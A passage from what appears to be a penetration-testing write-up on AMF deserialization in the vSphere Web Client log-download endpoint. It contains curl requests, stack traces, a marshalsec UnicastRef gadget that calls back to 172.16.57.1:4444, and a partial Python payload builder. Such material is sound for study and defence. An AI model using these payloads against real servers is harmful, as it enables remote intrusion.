* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec 1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 45
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 500
< Set-Cookie: JSESSIONID=1488241428F4AE1E7A8175ACAD6A276F; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Length: 2920
< Date: Sat, 04 Dec 2021 01:02:59 GMT
< Connection: close
< Server: Anonymous
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen"> html { background: #3075ab; /* Old browsers */ background: -moz-linear-gradient(top, #3a8dc8 0%, #183a62 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* IE10+ */ background: linear-gradient(to bottom, #3a8dc8 0%,#183a62 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */ background-repeat: no-repeat; height: 100%; overflow: auto; margin: 0; padding: 0; } #errorAreaWrapper { position: relative; float: left; left: 50%; margin-top: 30px; } #errorArea { position: relative; float: left; left: -50%; padding: 15px; background-color: white; font-size: 14px; color: #000000; font-family: Georgia, Arial, Helvetica, sans-serif; border: 1px solid black; } #errorImage { border: 0; margin-right: 10px; display: inline-block; vertical-align: top; } #errorAllText { display: inline-block; vertical-align: top; min-width: 500px; max-width: 700px; } #errorSorry { font-weight: bold; } #errorMessage { padding-top: 10px; padding-bottom: 10px; } #errorCheckLog { font-style: italic; } </style>
</head>
<body>
<div id="errorAreaWrapper">
<div id="errorArea">
<div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div>
<div id="errorAllText">
<div id="errorSorry">A server error occurred.</div>
<div id="errorMessage">Unknown AMF type '65'.</div>
<div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div>
</div>
</div>
</div>
</body>
</html>
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
wvu@kharak:~$
[2021-12-04T01:02:59.500Z] [WARN ] http-nio-9090-exec-7 70000069 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null. [2021-12-04T01:02:59.507Z] [ERROR] http-nio-9090-exec-7 o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager] Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is flex.messaging.io.UnknownTypeException: Unknown AMF type '65'.] with root cause flex.messaging.io.UnknownTypeException: Unknown AMF type '65'. at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:232) at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:134) at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:745) at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584) at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201) at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428) at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967) at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901) at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970) at 
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872) at javax.servlet.http.HttpServlet.service(HttpServlet.java:661) at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846) at javax.servlet.http.HttpServlet.service(HttpServlet.java:742) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at 
org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105) at 
org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214) at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177) at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347) at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at 
com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81) at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764) at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33) at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343) at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634) at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) at 
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:748)
Testing AMF deserialization using the UnicastRef gadget
```
root@895ea1dbdd95:~/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF3 UnicastRef 172.16.57.1 4444 | base64 -w 0 | xargs
Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA=
root@895ea1dbdd95:~/marshalsec#
```
```
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA="
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 133
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 500
< Set-Cookie: JSESSIONID=FCDFEC1FA6DBC64A0638002A142EB766; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Length: 2963
< Date: Sat, 04 Dec 2021 01:04:57 GMT
< Connection: close
< Server: Anonymous
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">
html {
  background: #3075ab; /* Old browsers */
  background: -moz-linear-gradient(top, #3a8dc8 0%, #183a62 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* IE10+ */
  background: linear-gradient(to bottom, #3a8dc8 0%,#183a62 100%); /* W3C */
  filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */
  background-repeat: no-repeat;
  height: 100%;
  overflow: auto;
  margin: 0;
  padding: 0;
}
#errorAreaWrapper { position: relative; float: left; left: 50%; margin-top: 30px; }
#errorArea { position: relative; float: left; left: -50%; padding: 15px; background-color: white; font-size: 14px; color: #000000; font-family: Georgia, Arial, Helvetica, sans-serif; border: 1px solid black; }
#errorImage { border: 0; margin-right: 10px; display: inline-block; vertical-align: top; }
#errorAllText { display: inline-block; vertical-align: top; min-width: 500px; max-width: 700px; }
#errorSorry { font-weight: bold; }
#errorMessage { padding-top: 10px; padding-bottom: 10px; }
#errorCheckLog { font-style: italic; }
</style>
</head>
<body>
<div id="errorAreaWrapper">
  <div id="errorArea">
    <div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div>
    <div id="errorAllText">
      <div id="errorSorry">A server error occurred.</div>
      <div id="errorMessage">Creation validation for class 'sun.rmi.server.UnicastRef' failed.</div>
      <div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div>
    </div>
  </div>
</div>
</body>
</html>
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
wvu@kharak:~$
```

```
[2021-12-04T01:04:48.349Z] [WARN ] http-nio-9090-exec-1 70000071 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null.
[2021-12-04T01:04:48.353Z] [WARN ] http-nio-9090-exec-1 70000071 ###### ###### c.vmware.vise.messaging.validators.ClassDeserializationValidator Deserialization skipped for type sun.rmi.server.UnicastRef
[2021-12-04T01:04:57.329Z] [ERROR] http-nio-9090-exec-1 o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager] Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is flex.messaging.io.SerializationException: Creation validation for class 'sun.rmi.server.UnicastRef' failed.] with root cause
flex.messaging.io.SerializationException: Creation validation for class 'sun.rmi.server.UnicastRef' failed.
    at flex.messaging.util.ClassUtil.validateCreation(ClassUtil.java:354)
    at flex.messaging.util.ClassUtil.createDefaultInstance(ClassUtil.java:115)
    at flex.messaging.io.AbstractProxy.createInstanceFromClassName(AbstractProxy.java:95)
    at flex.messaging.io.AbstractProxy.createInstance(AbstractProxy.java:115)
    at flex.messaging.io.amf.AbstractAmfInput.createObjectInstance(AbstractAmfInput.java:169)
    at flex.messaging.io.amf.Amf3Input.readScriptObject(Amf3Input.java:748)
    at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:156)
    at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:134)
    at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:745)
    at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584)
    at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201)
    at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:498)
    at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181)
    at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440)
    at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428)
    at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
    at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
    at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
    at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:661)
    at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317)
    at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127)
    at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214)
    at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177)
    at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347)
    at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
    at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764)
    at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33)
    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)
```
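The two requests above differ only in what `SelectedLogsSpec` decodes to. `QQ==` is the single byte 0x41 (`A`), which is not an AMF3 type marker, hence `Unknown AMF type '65'`. The marshalsec output is an AMF3 externalizable object whose class name is `sun.rmi.server.UnicastRef`, followed by the fields `UnicastRef.writeExternal` emits for its `LiveRef` (endpoint host and port, `ObjID`, a result-stream flag). The Python below is an added example, not code from this assessment or from marshalsec: it rebuilds that payload byte for byte from host, port and object number, and parses a `SelectedLogsSpec` value up to the point where `Amf3Input` has to instantiate the named class, which is where `ClassUtil.validateCreation` refused `UnicastRef` in the second trace. The field layout after the class name follows `sun.rmi.server.LiveRef.write` in the JDK; the object number `0x7c954d72` is simply what the page's payload contains.

```python
import base64
import struct

# AMF3 type markers. The test value "QQ==" is the single byte 0x41 ('A'), which is
# not a marker: that is the "Unknown AMF type '65'" error in the first response.
AMF3_MARKERS = {
    0x00: "undefined", 0x01: "null", 0x02: "false", 0x03: "true", 0x04: "integer",
    0x05: "double", 0x06: "string", 0x07: "xml-doc", 0x08: "date", 0x09: "array",
    0x0A: "object", 0x0B: "xml", 0x0C: "byte-array",
}
AMF3_OBJECT = 0x0A
UNICASTREF = "sun.rmi.server.UnicastRef"

# The marshalsec output shown on the page, copied verbatim.
PAGE_PAYLOAD = ("Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFc"
                "AAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA=")


def encode_u29(n: int) -> bytes:
    """AMF3 variable-length 29-bit unsigned integer."""
    if n < 0x80:
        return bytes([n])
    if n < 0x4000:
        return bytes([0x80 | (n >> 7), n & 0x7F])
    if n < 0x200000:
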